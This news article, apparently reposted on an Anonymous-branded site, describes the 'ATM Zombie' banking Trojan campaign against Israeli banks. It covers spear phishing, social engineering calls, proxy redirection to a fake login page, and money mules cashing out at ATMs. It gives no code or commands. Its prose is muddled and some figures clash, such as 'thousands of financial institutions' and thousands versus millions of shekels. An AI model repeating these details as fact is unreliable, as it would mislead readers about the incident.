ATM Zombie – A Malware Stealing Money From Israeli Bank Accounts


Hundreds or possibly even thousands of financial institutions in Israel ended up being the prey of an assault that allowed online criminals to pilfer several thousands of shekels from many bank accounts. Thanks to the extremely high and well-structured protocols of online safety checks in the Israeli banking industry that this deception was found early on, allowing security agents to try procedures in order to stop the assaults.

Image Source: The Jerusalem Post - A bank employee counts Israeli Shekel notes for the camera at a bank branch in Tel Aviv.
Image Source: The Jerusalem Post – A bank employee counts Israeli Shekel notes for the camera at a bank branch in Tel Aviv.

The hackers would use a technique called proxy changing. Rather than shifting money digitally, the online criminals mobilized an infantry of street thugs willing to draw out hardcore money coming from automated teller machines by making use of a cell phone application that permitted account members to allow the usage of ATM or plastic cards and deliver data requests for money withdrawals to cash machines using their devices.However, the street thugs or collectors, that did all the dirty work would deliver almost all of the cash to drop box services in Israel, which was later sent to other countries that is obviously, after keeping a bit for themselves.

This attack is social engineering at its best. Initially, the cyber criminals were required to convince the targets to view the link that would deploy the Trojan that provided them ability to access customer’s data and the capability to execute the attack. That was the first part, after handling the banking side carefully, the hackers had to persuade their hired workforce that they must be involved in an unlawful game to assist them to thieve shekels from cash machine and after doing that forward that money to a third part that the thugs had never seen or knew anything about them.

From a hackers point of view Bitcoins is ‘the money,’ but who doesn’t like cash.

Should there be a set limit on what you can pull out of an ATM at a time. So why to transfer the money from one account to another when you can make ATM spit the cash.

Image Source: Secure List – A chart showing how the ATM Zombie banking Trojan works, created by the experts in Kaspersky.

However, once the money collectors have all the required amount they pack it the cash, go to a near mail center and ship it overnight to an address given to them. The investigators said that currently they do not have all the details as to how and where the money was sent. But they are very positive that they had many tricks up their sleeves when it came to dropping off the money. For instance, the money collectors could go any small money exchange and could convert shekels into dollars and ship the package overnight.

The investigators stated that this theft involved many layers. To begin with the attacks, the online criminals would tunnel the virus using a technique called spear phishing. Spear phishing is an attack that is conducted by sending an email that seems as if it was sent from a known business or someone from your mailing list. The email has a link(s). Once the link is clicked on it either installs, a keylogger, spyware, a back door or anything that a hacker wants the link to conceal. Once the intended malware is installed all of the information can easily be captured.

Image Source: Security List – A screenshot of the malwares sudo code.

However, after that email is sent, the hackers will call the bank(s) and would pose as a personnel from the bank’s security branch, who are testing for online security features, and they would guide the person and convince them to click on the link that would eventually install the malware. The golden ticket in this attack is the fact that these hackers would place a fake digitally authorized license that makes it possible for people to share encoded communications with the servers connected to the financial institution(s). After that, the program created by the hacker would allow the data to be sent to the hackers server by changing the machines proxy, posting as if the data was being delivered to the right server(s), which in return would keep the banks security system quiet. So when the agents working in the bank would go to the banks official login page, they would be re-directed to the fake website – made possible by the malware hiding itself in the computer – that was an exact copy of the banks secure login page, and so the agent would end up entering their login credentials that are eventually going to be stored in the servers created by the hackers. After getting all the information required to alter the bank’s online system, the hackers can then work on the banks ATM’s and tell their hired money collectors to go a certain ATM at a certain time and collect the money from it. Which is then obviously mailed to the hacker’s foreign address.

Thanks to the security specialist working for the Israeli financial institutions, they were able to detect the intrusion in its primary stages and were able to stop it and save millions from being stolen.

Source: The Jerusalem Post, Secure List

You want to support Anonymous Independent & Investigative News? Please, follow us on Twitter:

This Article (ATM Zombie – A Malware Stealing Money From The Israeli Bank Accounts) is free and open source. You have permission to republish this article under a Creative Commons license with attribution to the author and


Get Your Anonymous T-Shirt / Sweatshirt / Hoodie / Tanktop, Smartphone or Tablet Cover or Mug In Our Spreadshirt Shop! Click Here



Please enter your comment!
Please enter your name here